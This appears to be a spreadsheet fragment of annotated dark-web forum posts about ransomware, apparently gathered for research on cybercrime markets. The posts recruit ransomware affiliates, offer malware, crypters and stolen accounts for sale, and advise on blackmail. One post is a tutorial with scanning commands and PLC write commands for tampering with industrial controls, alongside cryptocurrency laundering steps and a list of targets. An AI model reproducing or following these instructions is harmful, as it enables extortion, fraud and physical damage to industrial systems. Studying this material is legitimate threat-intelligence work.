  </si>
  <si>
    <t>[JOB] Looking for affiliates[ Ransomware] | VulcanRansomTeam</t>
  </si>
  <si>
    <t>currently looking for affiliates for inferno raas.  note: limited slots,;potential affiliates must be able to show proof of expertise.;all additional details will be provided.;interested? send a mail 13hourinferno@secmail.pro</t>
  </si>
  <si>
    <t>Inferno ransomware group seeking affliates</t>
  </si>
  <si>
    <t>/u/13Hourinferno</t>
  </si>
  <si>
    <t>007cbc53c5fa711e2275</t>
  </si>
  <si>
    <t>[JOB] Looking for ransomware affiliates</t>
  </si>
  <si>
    <t>currently looking for affiliates for inferno raas. note: limited slots,;potential affiliates must be able to show proof of expertise.;all additional details will be provided.;interested? send a mail 13hourinferno@secmail.pro</t>
  </si>
  <si>
    <t>418c956d1c04d9abe1f4</t>
  </si>
  <si>
    <t>69118f81d340f1e0b373</t>
  </si>
  <si>
    <t>14/03/2022 11:34</t>
  </si>
  <si>
    <t>1e7eb05a327924c320ea</t>
  </si>
  <si>
    <t>[JOB] We are looking for affiliates | VulcanRansomTeam</t>
  </si>
  <si>
    <t>0 days 21:36:00</t>
  </si>
  <si>
    <t>looking to encrypt a targets computer, potentially multiple computers and get a ransom out of it. a job done or tutorials would be appreciated;;the targets are not known personally, but there is contact with them on multiple channels.</t>
  </si>
  <si>
    <t>/u/fredonguyen</t>
  </si>
  <si>
    <t>19/10/2021 20:38</t>
  </si>
  <si>
    <t>716d218118d680a765f7</t>
  </si>
  <si>
    <t>[JOB] looking for ransomware</t>
  </si>
  <si>
    <t>0 days 05:56:00</t>
  </si>
  <si>
    <t>sure, i can do that for you, i have an entire library of ransomware. send a message if you are interested.</t>
  </si>
  <si>
    <t>/u/magicaldrugs</t>
  </si>
  <si>
    <t>20/10/2021 02:34</t>
  </si>
  <si>
    <t>0 days 04:46:00</t>
  </si>
  <si>
    <t>are you a student or engineer looking to join a great team and paint a bigger picture?;;we need your help!! find us valuable  targets and we'll pay you!;;only message us with our pgp provided in our profile;;all unencrypted messages will be ignored.;;faq?;;-how much and when will i get paid?;our success is your success! upon successful ransom payment you will receive 55%;of the payment;;-i'm at a small university can i get paid?;if  there's a network we're interested!;;if  there's a network we're interested!;;;if  there's a network we're interested!;;- azteam</t>
  </si>
  <si>
    <t>azteam ransomware group seeking hackers</t>
  </si>
  <si>
    <t>/u/AZteam</t>
  </si>
  <si>
    <t>2c29a581a95bc2b8c63f</t>
  </si>
  <si>
    <t>[Job - BTC] - Get Paid to Spread Ransomware RAAS</t>
  </si>
  <si>
    <t>4 days 06:42:00</t>
  </si>
  <si>
    <t>looking for someone to build me a ransomware where i can just plug my btc or xmr address and let the app do its thinkg. something like lockbit style.;;also willing to sell the information for 1btc and you can charge what ever you want. i'll be the insider contact. or we can partner up and split the gig 40/60;;hmu here, network not in the us but owned by a us company, running very old windows os systems and easy to break into. just not willing to ruin my opsec and land in jail.</t>
  </si>
  <si>
    <t>/u/drkphoenix</t>
  </si>
  <si>
    <t>13/11/2021 18:42</t>
  </si>
  <si>
    <t>be93b178d74cadefc881</t>
  </si>
  <si>
    <t>[Job - XMR] Got ransomware?</t>
  </si>
  <si>
    <t>well i totally support that also sorry to hear that happened to you.;i think what you wanna do is to build a honeypot to catch them but they are not stupid they use tails which is not ideal for any kind of malware attack cause the system will only stay compromised until reboot;but also i know for a fact that those motherfs like to store their shit somewhere to revisit something like a persistent storage or even a non amnesia operating system i say we could use a ransomware attach but delete their files and initiate a doxx attack and tip le.;i know they were using mega platform to share content between themselves but after mega took the files down they are using anonfile service its not that hard to make them download a file but the major issue is its hard to design a malware for all of them,;also i dont know any cp site nor i want to so you will take care of the rest;if this is somewhat interesting to you hit me back so we can talk details i like to put my free time in something useful...</t>
  </si>
  <si>
    <t>16/04/2021 15:13</t>
  </si>
  <si>
    <t>e3137f600df65025adc8</t>
  </si>
  <si>
    <t>[LFW - FREE] Will spread your walware FOR FREE if you set up a fake cp site for it</t>
  </si>
  <si>
    <t>so you already have the ransomware installed on victims pcs and you just need people to talk with the victims.;why you need somebody for this?</t>
  </si>
  <si>
    <t>Ransomware Discussion</t>
  </si>
  <si>
    <t>/u/gobig2021</t>
  </si>
  <si>
    <t>18/08/2022 11:51</t>
  </si>
  <si>
    <t>1a12986b8fff0fbf091f</t>
  </si>
  <si>
    <t>[LFW - XMR] Ransomware plus onion panel</t>
  </si>
  <si>
    <t>0 days 02:37:00</t>
  </si>
  <si>
    <t>no, i sell the ransomware with access to the panel so you need to spread it and then talk to the victims to earn money. i just sell the software and the panel access</t>
  </si>
  <si>
    <t>/u/Juicesporge</t>
  </si>
  <si>
    <t>18/08/2022 11:54</t>
  </si>
  <si>
    <t>hello, i'm joy, a computer scientist.;i love to code, and i like to code malwares, they are an interesting design constraint. i have 2 years of industry building boring websites and 6 months of malware dev time, i can do fixed prices per project or hourly billing (25 usd/h) for the software being built.;;i can do:;- keyloggers;- file stealers;- ransomwares;- remote shells;- crypto miners;- rats;- your custom functionality;;you can contact me at joytor@elude.in or here.</t>
  </si>
  <si>
    <t>/u/joy</t>
  </si>
  <si>
    <t>d2a5e7c5e76fe559cc5d</t>
  </si>
  <si>
    <t>[LFW - XMR] Will code malware for for money (ransomware, file stealers, keyloggers, etc)</t>
  </si>
  <si>
    <t>8 days 02:47:00</t>
  </si>
  <si>
    <t>hi, i'm joy, i program for a living, i've built all kinds of software artifacts, and can build one epic software for your unique needs, will deliver source code.;;rats, ransomwares, file stealer, session stealers, you name it and i'll code for you.;;rate: 1xmr/8h day of work;;find my contact info at http://atydkj4gfsl6oy6h.onion/about.html</t>
  </si>
  <si>
    <t>26/04/2020 06:20</t>
  </si>
  <si>
    <t>bbe5dc0fbeef8d97f6ad</t>
  </si>
  <si>
    <t>[LFW | XMR] Software developer (including mallware) will program for you.</t>
  </si>
  <si>
    <t>selling my python malware + ransomware.</t>
  </si>
  <si>
    <t>bb2bf1481f16c1cfd66d</t>
  </si>
  <si>
    <t>[LFW-BTC,XMR] MALWARE/RANSOMWARE (python)</t>
  </si>
  <si>
    <t>im looking for weekly paid jobs.;;im really good at social engineer, i can clone: emails, websites etc. can also help with scamming clients and having chat with them to pay for some scam.;;can harden your server and setup rats campaigns with good opsec.;;also i have a lot of resources that i will share if hired ( after a while) such as rats, binders, crypters, ransomwares and rats (android,windows,linux,mac).;;send me a pm if you re interested.;;min salary 300-500$</t>
  </si>
  <si>
    <t>3e1cd2570bef0bd2085b</t>
  </si>
  <si>
    <t>[LFW-XMR] LOOKING FOR WORK</t>
  </si>
  <si>
    <t>15 days 00:04:00</t>
  </si>
  <si>
    <t>hi there, i offer for free my services on crypting various type of malware such as rats, ransomware, keyloggers and so on... i  want to build here a really good reputation i order then to sell my high quality products.;;just hit the pm and sent me your malware, after is crypted i will resend it to you, all free of charge.</t>
  </si>
  <si>
    <t>/u/Paradisecooked</t>
  </si>
  <si>
    <t>28/08/2022 02:26</t>
  </si>
  <si>
    <t>9d9d366060434367e413</t>
  </si>
  <si>
    <t>[LFW-XMR] Will crypt your malware FOR FREE</t>
  </si>
  <si>
    <t>7 days 19:30:00</t>
  </si>
  <si>
    <t>;my services;;;$20-$50 usd = custom scam pages. included: bot/spider protection, unique page encryption + obfuscation, multi-page sessions, jabber/email notifications, &amp; more. pages are created from scratch, every time!;;[varied price] = custom malware. for windows, linux, or osx. ransomware, rat, key logger, web injects, etc. written in mostly in golang;;[varied price] = any other custom programming projects.;;jabber: (otr) xd@kode.im;dread:;/u/pdl;</t>
  </si>
  <si>
    <t>14/10/2019 10:43</t>
  </si>
  <si>
    <t>cfa8221d62ec17e50c14</t>
  </si>
  <si>
    <t>[LFW] Custom phishing/scam pages &amp; malware</t>
  </si>
  <si>
    <t>Individual offering a new native crypter to bypass ransomware detection</t>
  </si>
  <si>
    <t>raas provider (individual)  / potential hacker (individual)</t>
  </si>
  <si>
    <t>22/08/2022 12:09</t>
  </si>
  <si>
    <t>0e238fd41392dfd585dc</t>
  </si>
  <si>
    <t>[LFW] Redeemer Crypter (FUD, New Bypass for Ransomware Protection)</t>
  </si>
  <si>
    <t>what kind of topics are we takling about here for mentoring.  like when you say "guides and courses" this makes me think of either carding/fraud or some kind of intro-to-ransomware thing you might pay for on a hacking forum.  is that impression wrong?  are there more vanilla topics people would mentor on as well (e.g. software development, password cracking, pentesting,  etc.)?</t>
  </si>
  <si>
    <t>Person seeking information on what people want to be mentored on</t>
  </si>
  <si>
    <t>26/10/2021 11:17</t>
  </si>
  <si>
    <t>/d/Mentorship</t>
  </si>
  <si>
    <t>dbedd2bf12ce894949a0</t>
  </si>
  <si>
    <t>[POLL] WE NEED YOUR OPINION - Introducing the MENTORSHIP PROJECT</t>
  </si>
  <si>
    <t>13 days 21:11:00</t>
  </si>
  <si>
    <t>;;[raas] ransomware - partnership program windows/linux/esxi;;by;/u/partnership;���;11 months ago;in;/d/malware;;1 points;���;</t>
  </si>
  <si>
    <t>ransomware group name drop</t>
  </si>
  <si>
    <t>raas provider (group) / potential hacker (group)</t>
  </si>
  <si>
    <t>26/11/2021 02:40</t>
  </si>
  <si>
    <t>21d64baf06050dd54695</t>
  </si>
  <si>
    <t>[RaaS] Ransomware - Partnership Program Windows/Linux/ESXi</t>
  </si>
  <si>
    <t>26/11/2021 02:42</t>
  </si>
  <si>
    <t>24dd867d8b885f615064</t>
  </si>
  <si>
    <t>you will have to let us know:;;- the name of the business or company, we are not playing guesswork.;- the type of access that you have (user, admin) and describe your access.;whether you have rdp and what it is (installed and used by the victim or hidden, installed by you).;if there are any problems with access, it's a good time to specify them as well.;- provide some screenshots showing your access. show the product face, don't ask me what you want to see in the screenshot.;contact information:;;xmpp: raas@31337.life | raas@strong.pm;;tox : d1274bec5b1c6d770ff7bcf3d73cddd4f00f316a59817db90108b5c1f4d80645d282247640b1</t>
  </si>
  <si>
    <t>Group asking for info on a potential target</t>
  </si>
  <si>
    <t xml:space="preserve">potential hacker (group) / information (request) </t>
  </si>
  <si>
    <t>30/11/2021 13:25</t>
  </si>
  <si>
    <t>8f13d011f6b58a2d3739</t>
  </si>
  <si>
    <t>4 days 11:00:00</t>
  </si>
  <si>
    <t>-----begin pgp signed message-----;hash: sha256;;as you might have noticed, my original account cerebrate and my subforum;/d/redeemer;were closed.;;this was due to being banned by paris, because of future rules against ransomware.;to be precise i was bann</t>
  </si>
  <si>
    <t>Guy talking being banned for tlaking about ransomware</t>
  </si>
  <si>
    <t>/u/Cerebrate2</t>
  </si>
  <si>
    <t>27/08/2022 14:57</t>
  </si>
  <si>
    <t>f8e2cc73fa2aa974c319</t>
  </si>
  <si>
    <t>[Redeemer Ransomware] Response to Dread banning ransomware</t>
  </si>
  <si>
    <t>26 days 21:48:00</t>
  </si>
  <si>
    <t>any chance you have some ransomware for sale, would you direct me to solid sites that sell such things please?</t>
  </si>
  <si>
    <t>/u/poopoofuck</t>
  </si>
  <si>
    <t>20/09/2022 04:59</t>
  </si>
  <si>
    <t>5 days 10:42:00</t>
  </si>
  <si>
    <t>we need more john brown motherfuckers;;you will need:;;virtual machine software such as virtualbox or vmware (preferred.);virtual machine like linux kodachi, tails, whonix, or kali. it���s important to use a vm that can encrypt all of its traffic through tor, ���torifying��� the entire os;a vpn such as mullvad, paid for with bitcoin and fake name. if possible, several vpns with several routers.;if possible, buying a vps (virtual private server) with bitcoin under a fake name. you can get them on namecheap for $20 using bitcoin.;all of this is best on a burner (new, used) laptop paid with cash, used on public or hacked wifi if possible. you can hack your neighbor���s wifi with an alfa card and bettercap.;;you can set up burner email accounts with on tempmail, and a burner phone on textnow. textnow numbers are available for $1 and less on empire market.;for email, use protonmail or secmail. learn how to use pgp and use it.;look into elliptic curve cryptography (ecc);ricochet is good for a torified vm.;you can also buy hacked servers and rdp with admin access to login to.;;once you are set up with the vpn(s), torified virtual machine, and bought the virtual private server or hacked server, they should provide an ip  password to ssh into, you can change the password after logging in.;;the command will be:;ssh root@&lt;ip address&gt;;only do this after the vm has been torified, vpn is on, etc.;;the vm should be live, meaning it���s destroyed when it turns off.;;i like to use kodachi for a vm because you can filter all traffic through tor and change the mac address number, avoid 14 eyes, and many other things. mac address is the number physically on your computer, which can be found past your vpn.;;;buying bitcoin:;;you can buy in any of the traditional ways using your id, because it will be washed and be made untraceable using monero. so you can use coinbase, localbitcoins, bitcoin atms, paxful, to buy bitcoin using your regular identity. it���s better though to pay someone you know to buorks well) and send to your wallet.;;;after you do that, set up an account on agoradesk. access agoradesk on tor, you can find its url on dark.fail. send (withdraw) the bitcoin to your agoradesk wallet. then, use the bitcoin on agora to buy monero, which is a very sophisticated cryptocurrency with unprecedented levels of anonymity.;;once you have the monero, send to different monero wallet, and then can send to another or two after that if you wish, usually 1 other is fine but some people like 2-3. you can set up other accounts on agoradesk for this or use accounts on other sites, like empire, to receive the monero. then you can go back to agoradesk, set up another account or use one of the burner accounts, and change the monero back into bitcoin.;;this will make it untraceable; they will build a quantum base on the moon before they would be able to track that.;be sure to use reputable vendors on cryptocurrency exchanges.;;btc &gt; xmr &gt; xmr &gt; xmr &gt; btc;;;after the bitcoin has been bought, washed, and returned back to bitcoin, you can buy the virtual private server (vps) and virtual private network/s. (vpn) and whatever else you would need to effectively resist the state and bring justice to humanity.;;;;;;;the basics of hacking industrial controls;;straight to the point, we are better off spending our time hacking industrial controls, specifically scada, than hacking credit card databases or social media or whatever the majority of hackers and fraudsters get involved with. directly at the core of the industrial process is where the iron is hot enough to strike.;;many industrial controls rely on programmable logic controllers (plcs) which run on a protocol called modbus to control industrial processes. modbus is from the 1970s and has no encryption or authentication, so it���s extremely easy to hack.;;tools needed:;mbtget from sourceperl;smod-1 from theralfbrown;;;plcs run on port 502. you can find open port 502s by searching port:502 on shodan or zoomeye. even better is scanning port 502 with zmap on a cidr bike;zmap -p 502 166.169.0.0/16;;or masscan across a large ip range such as;masscan -p 502 166.141.0.0-166.141.255.255;you can also use nmap���s modbus-discover, tools like plcscan, etc.;;use mbtget to see the values on the plc and throw the ip in the search browser to see if it���s connected to an hmi (human machine interface).;;./mbtget -a 0 -n 100 &lt;ip address&gt;;���to read what���s on the plc;;./mbtget -w6 40000 -a 0 -n 100 &lt;ip address&gt;;���to change address 0���s value to 40000.;;changing the values on a plc can result in severe damage to the industrial, physical process. this should only be done from your private or hacked server, never just from the vm.;;this is just one of the ways to hack industrial controls. there are many, on different equipment than the schneider plc, on different software like fieldbus.;;by exploring new methods of hacking industrial controls, the world will be in your hands. with the right motivation and goal, it can be a force of ultimate good.;;;al;;git clone http://github.com/_____/_____;^ command to obtain magic powers from github. the blank spaces are the member and tool, it���ll be under ���clone��� or just the url.;;you will find many crazy scripts, including scadashutdowntool, developed by the israeli cyber force.;;some have an installation process:;;if you see ���requirements.txt���, do:;pip install -r requirements.txt;;;if you see ���setup.py��� do:;python setup.py install;;if you see ���makefile.pl���;can do perl makefile.pl or ���make���;;(don���t forget, you can hit tab when using linux to finish the whole word, so you don���t have to type out every letter of every word.);;many nation states and powerful hacker groups leverage tools off github for their operations, in some cases exclusively tools from gh.;;for finding subdomains, i like sublist3r. for emails, i like emailharvester.;;using tools like metasploit has the potential to be traced back to you. the compaaccount with fake name.;~~~~~~~~~~~~~~~~;;youtube is a great place with uncountable videos on hacking. searching for any hacking term you���ll find some kind of tutorial. you can find tutorials on using mbtget and smod-1, etc.;;also searching for resources for penetration testers and red teamers, security consultants studying for the oscp exam, you���ll find tons of great information. look up ���pentester cheat sheet��� or ���red team cheat sheet��� and go from there. a lot of the great cheat sheets are on github. for more advanced, check out ired.team;;learn about sql injections and dorks;learn about xss (cross site scripting) and csrf (cross site request forgery);both of these are huge and widely used by hackers of all skill levels;hardware:;hackrf one;wifi pineapple (and everything from hak5);redteamtools.com (for locks, rfid cloning, etc);burner phones are mandatory for things like protests, and definitely for organizing. do not ever connect your burner phone to your hoag at your home. cia and gchq gangs will see the telecom logs of phones that go in and out as with faraday cages and be highly suspicious of that and possibly look into it. for that reason, take the burner phone out of the faraday bag away from your home and place back in away from your home. even better and maybe just as important, buy and discard burner phones regularly.;subcowmandante marcos;;-please read both guides by phineas phisher/subcowmandante marcosseveral times. google ���hack back phineas phisher��� it���s on anarchist library and another on exploit.db;;targets;;the best you can do right now is go after police departments, private prisons, i.c.e., oil companies, banks, etc. the people can not win against tanks and drones, like i said. do your due diligence, used advanced opec, and do plenty of recon before going deep. aside from that, industrial hacking is much more powerful if you are nearby them and can sniff an industrial ip with a wifi pineapple or something.;;also can utililook up what the major apts are doing with dns hijacking and in general at mitre att&amp;ck / groups.;we need to start using ransomware for political purposes and not just money. as in, locking a government or police computer system and demanding they take certain actions such as passing a bill or withdrawing their troops, and then we unlock their computers.;-;don���t forget, keep the target to the police state, prisons, banks, ice, big pharma, oil���especially companies that loot and exploit indigenous, black and brown communities in america and abroad. keep it to structures that lie at the heart of</t>
  </si>
  <si>
    <t>discusses the tools and methods needed to hack industrial controls, specifically programmable logic controllers (PLCs) that run on a protocol called Modbus. They then talk about education for learning these skills.</t>
  </si>
  <si>
    <t>/u/malarkey</t>
  </si>
  <si>
    <t>7ed34f49fc221ab3c402</t>
  </si>
  <si>
    <t>[Tutorial] The New Abolitionists: Basics of Hacking Industrial Controls</t>
  </si>
  <si>
    <t>31 days 18:55:00</t>
  </si>
  <si>
    <t>damn. that sucks - this is basically one of my nightmares. since you are asking for advice, i am going to give it to you - although you might not like everything i have to say.;;i would definitely refrain from the third option - as a number of others have suggested. by paying the money, you are basically giving the adversary a lot of control over you. even if it didn't;"hurt bad";, you have no way of knowing whether they will hold up their end of the deal. they might very well ask all your money and still leak your personal information. they have, unlike ransomware vendors, no reason to uphold a certain level of trustfulness or image.;;personally, if you succeed in changing your ssn and dl, i'd go with the first one. but the mere assumption that this will be enough, is naive at best.;;;;make sure you are not compromised otherwise;- clean your devices thoroughly. reinstall your laptop/desktop, make sure it is up-to-date and secure. if you have the funds, ditch your smartphone and get yourself a pixel running grapheneos on it. limit your apps as much as possible and only use trusted ones from f-droid.;;change your current accounts;-;only after having completed the former step, as doing this with a compromised device doesn't have any effect;. arguably the best would be to change the common denominator (mail address, mobile number). you might even want to consider changing your mobile telco, if they aren't actively working against sim-swapping. use secure, complex passwords (preferably through a password manager) and enable two-factor authentication wherever possible.;;change your habits;- as hard as this might be to read/grasp, most often human error is what makes these attacks possible in the first place.;;as to gps tagging your car: it is unlikely that your car was physically tagged by the adversary, as that would be some bad opsec from their side. do you use your phone with google maps for navigation? and if not, what do you use for navigation? sounds like they somehow gained access to either your navigation system account or your phone / one of the linked accounts on it. i mean, do you travel without your phone on you?;;all the best man! if i can be of any further help, do not hesitate to reply!</t>
  </si>
  <si>
    <t>Discussing ransomware solutions</t>
  </si>
  <si>
    <t>/u/Mando</t>
  </si>
  <si>
    <t>21/12/2020 19:01</t>
  </si>
  <si>
    <t>de5b295ef68932aecbb9</t>
  </si>
  <si>
    <t>[Update] I was doxxed</t>
  </si>
  <si>
    <t>1 days 09:59:00</t>
  </si>
  <si>
    <t>hi dear customers , sadly we have to move from whitehouse , thank you;/u/mr_white;for all the business;;my dear customers you can find me at following markets :;;;/d/dark0dereborn;;/d/worldmarket;;/d/alphabay;;/d/royalmarket;;/d/torrezmarket;;.;������������ search for my username on the following markets  click search : drhack3r , view vendor's item : drhack3r ������������;;��� 100% full escrow ���;;nb : i deal only in the market , no telegram , no instagram , no poopoogram , no dildogram , dont ask for any messenger please , no deal on dread too;;;;������ new product : benumb invite code + key : best cc dumps cvv autoshop ever / very hard to get invite code , its a private cc shop (strictly invite only ) all carders use it (non vbv /;;avs master /amex worldwide eu/us/au/uk/africa/south america ......... );;many cc vendors in the darknet buy from benumb and resell to you here in markets;;��������������� benum����������;;������ new product : pack of 10x monero silent miner = mine xmr using infected computers + setup and spreading tutorial ������;;������ new product : facebook database = 523 million user database + email + phone number ������;;������ new product : ransomware + spreading guide;;������ new : venom rat / warzone rat = 100 % undetectable , steal bang logs /paypal / cc , facebook , gmail ..... passwords = take total control of pc's victims;;��� bank logs with balance + cashout tutorial ���;;��� hacked paypal with balance ���;;��� high quality custom scans ���utility bill worldwide ���;;��� real passport scans not photoshopped ���;;���stop burning your cc/ paypal/bank logs ���carding machine fullz setup;;��� emv x2 soft to clone cards;;��� genesis invite code;;��� non vbv credit cards infos ��� full escrow ���;;��� special listing request any account you want ��� (check below account list available);;��� dumps ���;;��� rdp ���;;��� software to bypass 2fa ���;;��� bulk for resellers hacked paypal with random balance (4$/account) ���;;��� ransomware ���;;��� silent miner ���;;��� linkensphere new generation browser ���;;��� uber accounts ���;;��� walmart acc ���;;��� more than 1500 acc hacked ���;;��� hacked bank logs with cashout tutorial in crypto ���;;��� hacked western union with cc attached + cashout tutorial ���;;��� scamming/spamming tools + up to 1 billion emails worldwide ���;;��� antidetect latest 7.3 + fraudfox + 4,000 config;;��� and many more ���;;;���[stop burning your cc/pp/bank logs 99% ���full virtual carding machine + antidetect ���ready to card���;;[][][][][][][][][][][][][][][][][][][][][] 100% full escrow [][][][][][][][]][][][][][][][][][][];;;stop burning your cc/accounts/bank logs;;stop wasting time or money on outdated and infected software.;;acquire all the necessary tools to increase carding success 99% !;;the following is what th;;after installing windows 7 pro in your virtual machine, the instructions how to put this together is very simple and effective!;;;;��� usa non vbv cc 100% valid with balance from 5,000 to 20,000$ + tutorial ��� fresh  daily sniffed ���;;;+++ rdp available , any country ++++;;+++keybank logs with random balance available ,  +++;;+++creditonebank logs with garanteed 3000$ balance + cashout tutorial +++;;+++ hacked paypal accounts with balance linked to valid visa card available fresh 1+++;;;;;���������������������������������������������������������������������������������������������������������������������������������;;[drhack3r] bulk for resellers 50xhacked paypal with random balance = 4$ per account;;�����������h;++++++++++++++ new stock 2021 ++++++++++++;;x2 all in one emv/nfc ( 2021) software to clone cc + atr tool 2.1 + jcop + arcq;;;;;++++++++ xfinity.com accounts internet video on demand tv lifetime comcast +++++;;;;;++++++ uber driver hacked accounts +++++++;;;;++++++ uber customer hacked accounts +++++;;;;+++++ aliexpress acc (perfect for carding) +++++;;;++++ hacked paypal accounts with balance + cashout tutorial :;;;;++++ restock , hacked western union accounts with credit card attached :;;;++++ restock hacked creditonebank account with balance + tutorial to cashout in monero :;;;++++ vip72.com (best proxy socks5 provider accounts lifetime);vip72 is for far away the best vpn for fraud usage , over thousand and thousand locations all over the world and precise as you can choose states and city where you want to be !!;;;++++ restock usa/worldwide passport scans;;++++ restock zipcar accounts;;and many more +++;;��� special listing request any account you want ���;;around 500 accounts + available (caing here limited to 10,000 words);;������������ search for my username on whitehouse click search : drhack3r , view vendor's item : drhack3r ������������;;[][][][][][][][][][][][][][][][][][][][][] 100% f</t>
  </si>
  <si>
    <t>DrHack ransomware provider advertising services</t>
  </si>
  <si>
    <t>/u/drh3</t>
  </si>
  <si>
    <t>e5c5f2fbec9ea5bdedb6</t>
  </si>
  <si>
    <t>[drhack3r] FIND ME AT,  WORLDMARKET, DARKFOX, TORREZ , ALPHABAY ��� BENUMB INVITE���Linkensphere carding browser��� Monero Silent Miner��</t>
  </si>
  <si>
    <t>https://www.europol.europa.eu/newsroom/news/five-affiliates-to-sodinokibi/revil-unplugged;;suspected of about 7 000 infections, the arrested affiliates asked for more than 200 million euros in ransom;;updated on 8 november at 18:30;;on 4 november, romanian authorities arrested two individuals suspected of cyber-attacks deploying the sodinokibi/revil ransomware. they are allegedly responsible for 5 000 infections, which in total pocketed half a million euros in ransom payments. since february 2021, law enforcement authorities have arrested three other affiliates of sodinokibi/revil and two suspects connected to gandcrab. these are some of the results of operation golddust, which involved 17 countries*, europol, eurojust and interpol. all these arrests follow the joint international law enforcement efforts of identification, wiretapping and seizure of some of the infrastructure used by sodinokibi/revil ransomware family, which is seen as the successor of gandcrab.</t>
  </si>
  <si>
    <t>Talks about the arrest of two cyber criminals</t>
  </si>
  <si>
    <t>News</t>
  </si>
  <si>
    <t>24566c0bb4d692567ac5</t>
  </si>
  <si>
    <t>[happening now :D] Five affiliates to Sodinokibi/REvil unplugged</t>
  </si>
  <si>
    <t>0 days 07:30:00</t>
  </si>
  <si>
    <t>you .. you should stick with making your own ransomware.;;i havent actually tried myself in full transparency .. but the ones i've looked into always are full of complaints. anyone who does ransomware well doesnt need to do it "as-a-service" .. it makes fucking loads of money if you do it halfway decent ..</t>
  </si>
  <si>
    <t>giving advice to other about making their own  ransomware</t>
  </si>
  <si>
    <t>/u/finite</t>
  </si>
  <si>
    <t>27/08/2018 08:05</t>
  </si>
  <si>
    <t>c6f005a7ede05924326f</t>
  </si>
  <si>
    <t>[title]Ranion RaaS[/title]</t>
  </si>
  <si>
    <t>10 days 14:33:00</t>
  </si>
  <si>
    <t>76 days 06:23:00</t>
  </si>
  <si>
    <t>have the .onion to this raas?;what package do they use?</t>
  </si>
  <si>
    <t>Seeking info on Raas Group</t>
  </si>
  <si>
    <t>31/10/2018 23:55</t>
  </si>
  <si>
    <t>65 days 15:50:00</t>
  </si>
  <si>
    <t>what is the best raas group to join right now? i have looked at ranion and a few others but dont want to spend the money cause of the mixed reviews? any info is appreciated.</t>
  </si>
  <si>
    <t>Seeking info on Raas Groups</t>
  </si>
  <si>
    <t>dab7ccc7f67770f09e73</t>
  </si>
  <si>
    <t>best RAAS service?</t>
  </si>
  <si>
    <t>52 days 14:35:00</t>
  </si>
  <si>
    <t>if you don't want to spend money check out my project - redeemer (;/d/redeemer;) ransomware. it's free to download and use but has a 20% fee for decryption.</t>
  </si>
  <si>
    <t>Providing hacker sevices</t>
  </si>
  <si>
    <t>money aint a problem at all. ill pay for the right setup but i aint trying to waste time and money on stuff that just gets picked up on av. i got sources inside of some big industrial job sites and can get access to the systems easily. 1 of the company's brings in 48mil a year revenue. i can hit the bank account or whatever but i prefer to hit em with ransomware first cause my people can feed me the new account info after they switch shit up and then i can hit again. im about to just study hard and build something myself cause i really aint trying to give no percentage cut cause these going to be some big payouts cause they running outdated software.</t>
  </si>
  <si>
    <t>Person talking about potential attack they are working on</t>
  </si>
  <si>
    <t>hey guys,;;thanks for taking the time to read this and giving me your opinion first off.;;i wanted to know if anyone had any experience with the bitcoin ransomware source code.;;i am a noob in programming i learn fairly quickly i can do some java, python, and understand basic things like regex etc..;;i was wondering if anyone had thoughts or experience setting up the open source software etc. and what i should expect.;;thanks guys.</t>
  </si>
  <si>
    <t>Seeking hacker information</t>
  </si>
  <si>
    <t>/u/lelouchethebastard</t>
  </si>
  <si>
    <t>22/03/2019 18:20</t>
  </si>
  <si>
    <t>7771c4ab5ae0f9e0d72e</t>
  </si>
  <si>
    <t>bitcoin ransomware</t>
  </si>
  <si>
    <t>81 days 05:47:00</t>
  </si>
  <si>
    <t>its not easy. this is complicated stuff, it isn't usually as simple as just throwing it in a compiler. its more like install a million dependencies and hope nothing breaks while this sketchy python console freezes. but if you get all your shit together it eventually works.</t>
  </si>
  <si>
    <t>Providing hacker information</t>
  </si>
  <si>
    <t>/u/Snafubar</t>
  </si>
  <si>
    <t>24/03/2019 20:44</t>
  </si>
  <si>
    <t>it's not complicated at all if you know how to code. there's even open source code on github you can check out and modify accordingly.;;i made a mac osx/windows 7+ ransomware that bypasses windows defender and xprotext/gatekeeper and took me a few months. regardless it worked.;;the trick with all this shit is getting the user infected. windows users are easier imo but mac osx delivery methods can be a pain in the ass. the classic malicious word document works well but again mac osx sandboxes you and limits a lot of shit.</t>
  </si>
  <si>
    <t>/u/FliP</t>
  </si>
  <si>
    <t>79 days 03:23:00</t>
  </si>
  <si>
    <t>i have bitcoin stealer and ransomware...;i need someone who can spread and earn share of proceed.;purestmoney@hot-chilli.net</t>
  </si>
  <si>
    <t>Providing hacker services, seeking hacker support</t>
  </si>
  <si>
    <t>5cc8398a8b5be06e10e7</t>
  </si>
  <si>
    <t>bitcoin stealer and ransomware</t>
  </si>
  <si>
    <t>i dont think its a good idea to blackmail someone make sure the person u blackmail is not too emotional or has any heart problems;;ransomware is easy way to go on about it after backing up so u can still send back the details incase if the payment is not made in the time;;well why dont u just transfer the money as that's what u are going to ask for. whats the point in blackmailing when u already have the sensitive info of bank i hope ur not just planing on blackmailing someone with screenshot of just their bank balance amount.;;and about ransomware make sure to use custom scripted as the common version is easily stopped using youtube video tutorials.;;another measure is before u charge out make sure ur opsec is top notch.</t>
  </si>
  <si>
    <t>/u/onlycarddeals</t>
  </si>
  <si>
    <t>22/01/2021 15:21</t>
  </si>
  <si>
    <t>828344e182441a54170c</t>
  </si>
  <si>
    <t>blackmail after compromising someone?</t>
  </si>
  <si>
    <t>0 days 03:47:00</t>
  </si>
  <si>
    <t>2 days 05:33:00</t>
  </si>
  <si>
    <t>i dont think its a good idea to blackmail someone make sure the person u blackmail is not too emotional or has any heart problems;;why? does this make things more difficult in your experience?;;;ransomware is easy way to go on about it after backing up so u can still send back the details incase if the payment is not made in the time well why dont u just transfer the money as that's what u are going to ask for. whats the point in blackmailing when u already have the sensitive info of bank i hope ur not just planing on blackmailing someone with screenshot of just their bank balance amount.;;i don't want to invest in top quality ransomware just yet since i'm still starting out and testing things and i don't actually want to drain them and ruin their lives, especially given the current economic situation, so draining their accounts is not of interest to me. i will just be demanding an affordable payment.;;any opsec tips when it comes to blackmail? my opsec is decent but it doesn't hurt to know more</t>
  </si>
  <si>
    <t>/u/Mauritzio1738</t>
  </si>
  <si>
    <t>22/01/2021 15:34</t>
  </si>
  <si>
    <t>i've been reading the courses or guides to learn c arent worth it. any books that you guys recommend? ultimately want to code my own ransomware</t>
  </si>
  <si>
    <t>17/03/2021 07:06</t>
  </si>
  <si>
    <t>0128e4059503eadb01ee</t>
  </si>
  <si>
    <t>c language book recommendation?</t>
  </si>
  <si>
    <t>1 days 11:22:00</t>
  </si>
  <si>
